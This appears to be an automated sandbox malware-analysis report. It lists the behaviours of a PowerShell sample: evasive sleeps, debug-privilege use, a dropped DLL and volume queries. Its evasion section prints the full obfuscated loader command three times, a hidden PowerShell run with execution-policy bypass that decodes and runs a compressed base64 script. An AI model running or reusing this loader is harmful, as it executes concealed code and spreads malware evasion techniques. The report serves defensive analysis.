Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3255 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4243 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4230 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1456 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 Thread sleep count: 4230 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 Thread sleep count: 1456 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siaancgwcca5vvxw/jnhb8{2}6{2}ygg'+'ojitl'+'huefxdzbdxv2ucjdegae0etamhkbw'+'srqadekqtph4v5euqa/hcdrtgy1xl8ph7cy5ka{1}zurtwo5rbhc4zz1ey6d33wd7bhselfmhn4ov8b2{1}gbre7nx6hk7sdhtj8pmyvk8mfgj/hghbcjaozg8kp1xyimkrajmui5hz'+'hxmxy8c5indvb{2}xy1xbxcoljflh2u8{1}lvdbvw7{2}puqfw8zijerlzuzphhako5k+lv4ce5evzsrbynpkasdlugl8bkzgvhr/dxmiiqjv{2}awc8da/wh+vnczp2odfbzyrk8'+'1wyfkjt5mu'+'7s+4o41vljhtfocsvwnz5jdn7+0/e8og1vxi3rfy6jvkkxnbwxy7g2fq+qrlgx2b/hvuetko3hhbvotsxfip5m/el{2}0fbncn5grsmp5mmv/dhuw6/dq+ttrifd'+'obivnre2s8sxs7klv1wnyuec0vff6hdtmqc12dv0kbuqnzus1qmhxz8oftzsgifpwa1f38oaapgezpmgk2kw{1}wxyrc6owb8ozzpqfjd{1}zueupc6i6a06zfyyptotmztw7wgtiilzug+4phv1pz0uwintu82ujtp5zub0ngvcvzpjkfho+7z88dzce6lr'+'zhu4nbrcgokcycw5/ejincbx15gt/zexe/bvrgxlrspenvw6rm5bfulybldifnratg+nekb4unbfwjx{2}qr2zdwoctk7whwmd{2}ykr653kh5ygwiscp3kmpjyla4lua6lkp{1}mm3wiusynci/2egbkx{2'+'}8i70stb7mxlmgw3fg/j{2}opcohgwy66l6nbu+ujirt+n0vr0bjcw0snijwls8px+rvwsz1jduba0nct{1}yevz1lrzlw33hacndetq3vahwy0uvvylj/mig6vt2mqrrd4nyr5rqc0y5xig{1}v66rtren6rzwhkshmemw{1}h7caycyxgk6zxtd7nbq+v7l4xvupdcso2vvoytiu016qh00pxhue6ufhwcphpvtd'+'uarphh+4zbfepv4kopp57bc3wtzkbcbw+ea6grliluwkdwmknhxp6x+t{2}ivno4ihnqli76eu5akk0jeqbsuk2hs4pfoqzlogecq{1}qjtx'+'hcdj{2}sq217xw'+'b+x/5tyf7tsv3dhvm1nvozf3rz3ip+4pene8klrr+fsh3r66lrmpboso1c1xev/7xobk74p'+'nb+svoxsh3frkgiaaa{0}')-f'=','q','9')))),[system.io.compression.compressionmode]::decompress))).readtoend()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((new-object system.io.streamreader(new-object system.io.compression.gzipstream((new-object system.io.memorystream(,[system.convert]::frombase64string((('h4siaancgwcca5vvxw/jnhb8{2}6{2}ygg'+'ojitl'+'huefxdzbdxv2ucjdegae0etamhkbw'+'srqadekqtph4v5euqa/hcdrtgy1xl8ph7cy5ka{1}zurtwo5rbhc4zz1ey6d33wd7bhselfmhn4ov8b2{1}gbre7nx6hk7sdhtj8pmyvk8mfgj/hghbcjaozg8kp1xyimkrajmui5hz'+'hxmxy8c5indvb{2}xy1xbxcoljflh2u8{1}lvdbvw7{2}puqfw8zijerlzuzphhako5k+lv4ce5evzsrbynpkasdlugl8bkzgvhr/dxmiiqjv{2}awc8da/wh+vnczp2odfbzyrk8'+'1wyfkjt5mu'+'7s+4o41vljhtfocsvwnz5jdn7+0/e8og1vxi3rfy6jvkkxnbwxy7g2fq+qrlgx2b/hvuetko3hhbvotsxfip5m/el{2}0fbncn5grsmp5mmv/dhuw6/dq+ttrifd'+'obivnre2s8sxs7klv1wnyuec0vff6hdtmqc12dv0kbuqnzus1qmhxz8oftzsgifpwa1f38oaapgezpmgk2kw{1}wxyrc6owb8ozzpqfjd{1}zueupc6i6a06zfyyptotmztw7wgtiilzug+4phv1pz0uwintu82ujtp5zub0ngvcvzpjkfho+7z88dzce6lr'+'zhu4nbrcgokcycw5/ejincbx15gt/zexe/bvrgxlrspenvw6rm5bfulybldifnratg+nekb4unbfwjx{2}qr2zdwoctk7whwmd{2}ykr653kh5ygwiscp3kmpjyla4lua6lkp{1}mm3wiusynci/2egbkx{2'+'}8i70stb7mxlmgw3fg/j{2}opcohgwy66l6nbu+ujirt+n0vr0bjcw0snijwls8px+rvwsz1jduba0nct{1}yevz1lrzlw33hacndetq3vahwy0uvvylj/mig6vt2mqrrd4nyr5rqc0y5xig{1}v66rtren6rzwhkshmemw{1}h7caycyxgk6zxtd7nbq+v7l4xvupdcso2vvoytiu016qh00pxhue6ufhwcphpvtd'+'uarphh+4zbfepv4kopp57bc3wtzkbcbw+ea6grliluwkdwmknhxp6x+t{2}ivno4ihnqli76eu5akk0jeqbsuk2hs4pfoqzlogecq{1}qjtx'+'hcdj{2}sq217xw'+'b+x/5tyf7tsv3dhvm1nvozf3rz3ip+4pene8klrr+fsh3r66lrmpboso1c1xev/7xobk74p'+'nb+svoxsh3frkgiaaa{0}')-f'=','q','9')))),[system.io.compression.compressionmode]::decompress))).readtoend()))" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
